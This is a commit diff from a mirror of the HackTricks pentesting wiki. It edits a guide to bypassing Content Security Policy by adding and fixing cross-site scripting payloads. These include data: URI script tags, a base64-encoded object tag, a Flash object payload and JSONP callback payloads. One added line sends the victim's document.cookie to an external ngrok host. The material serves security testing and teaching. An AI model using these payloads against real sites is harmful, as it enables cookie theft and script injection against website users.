0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

GitBook: [#3634] No subject

This commit is contained in:
CPol 2022-10-28 08:59:49 +00:00 committed by gitbook-bot
parent 69ae5653b7
commit 542406d1b2
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 16 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
pentesting-web/content-security-policy-csp-bypass/README.md
View File

@ -128,6 +128,18 @@ Working payload:
"/>'><script src=data:text/javascript,alert(1337)></script>
```
### Whitelisted data:
```yaml
Content-Security-Policy: script-src data: ;
```
Working payload:
```html
<script src=data:text/javascript,alert(1337)></script>
```
### Lack of object-src and default-src
{% hint style="danger" %}
@ -142,7 +154,7 @@ Working payloads:
```markup
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
">'><object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
">'><object type="application/x-shockwave-flash" data='https://ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
<param name="AllowScriptAccess" value="always"></object>
```
@ -206,9 +218,10 @@ Scenarios like this where `script-src` is set to `self` and a particular domain
```markup
"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>
"><script src="/api/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
"><script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1)"></script>
```
[JSONBee](https://github.com/zigoo0/JSONBee) contains ready to use JSONP endpoints to CSP bypass of different websites.
****[**JSONBee**](https://github.com/zigoo0/JSONBee) **** contains **ready to use JSONP endpoints** to CSP bypass of different websites.
The same vulnerability will occur if the **trusted endpoint contains an Open Redirect** because if the initial endpoint is trusted, redirects are trusted.
@ -525,6 +538,7 @@ Example: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y
* [https://lcamtuf.coredump.cx/postxss/](https://lcamtuf.coredump.cx/postxss/)
* [https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d](https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d)
* [https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme](https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme)
* [https://www.cobalt.io/blog/csp-and-bypasses](https://www.cobalt.io/blog/csp-and-bypasses)